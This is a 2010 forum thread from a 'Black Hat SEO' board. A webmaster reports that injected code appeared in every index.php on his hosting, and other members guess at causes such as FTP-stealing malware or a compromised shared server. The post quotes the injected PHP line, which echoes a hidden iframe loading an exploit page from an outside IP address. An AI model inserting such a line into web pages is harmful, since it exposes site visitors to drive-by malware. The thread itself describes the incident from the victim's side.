1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Latest Wordpress Hack

Discussion in 'Black Hat SEO' started by mikemeth, Dec 24, 2010.

  1. mikemeth

    mikemeth Power Member

    Joined:
    Jun 26, 2009
    Messages:
    582
    Likes Received:
    115
    Home Page:
    On my hosting today in morning all sites got some weird iframe when opening them, got some code showing on top of site "dsa sda sda asd asd" etc..

    I found the echo '<iframe src="http://116.255.180.231/elt/e/index.php" name="fr1" scrolling="no" frameborder="no" align="center"></iframe>'; code in all index.php on my hosting

    had to change all index.php to get rid of it,

    is that hack or problem of hosting? What should i do now not to get same thing happen again.
     
  2. Sonat

    Sonat Junior Member

    Joined:
    Sep 15, 2009
    Messages:
    116
    Likes Received:
    553
    Occupation:
    Try to be an good IM
    Location:
    International Area
    When open my browser on virtual machine my AV get crazy:
    One Java exploit + one Adware.
    Clean up all your ftp AND your pc !
     
  3. mikemeth

    mikemeth Power Member

    Joined:
    Jun 26, 2009
    Messages:
    582
    Likes Received:
    115
    Home Page:
    How I clean up FTP any tool for that?
     
  4. angelas111

    angelas111 Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 4, 2009
    Messages:
    1,570
    Likes Received:
    1,016
    Location:
    ohio
    that means a virus got on your computer and uploaded to all your sites via your ftp client. so the problem is with your computer not your sites.
     
  5. Daniel0cean

    Daniel0cean Regular Member

    Joined:
    Aug 18, 2010
    Messages:
    478
    Likes Received:
    119
    Occupation:
    Freelance WebMaster
    Location:
    OnLine
    Home Page:
    you`d better clean all your files manually. from what you say I believe you`re hosting on godaddy. I had twice that problem with them. Apparently if your wordpress is up to date you are not hacked/exploited with this, but it was proven that varoius joomla sites hosted on the same shared server are the cause of it.
     
  6. edoho

    edoho Junior Member

    Joined:
    Mar 6, 2010
    Messages:
    122
    Likes Received:
    93
    what is your hosting?that is CS right?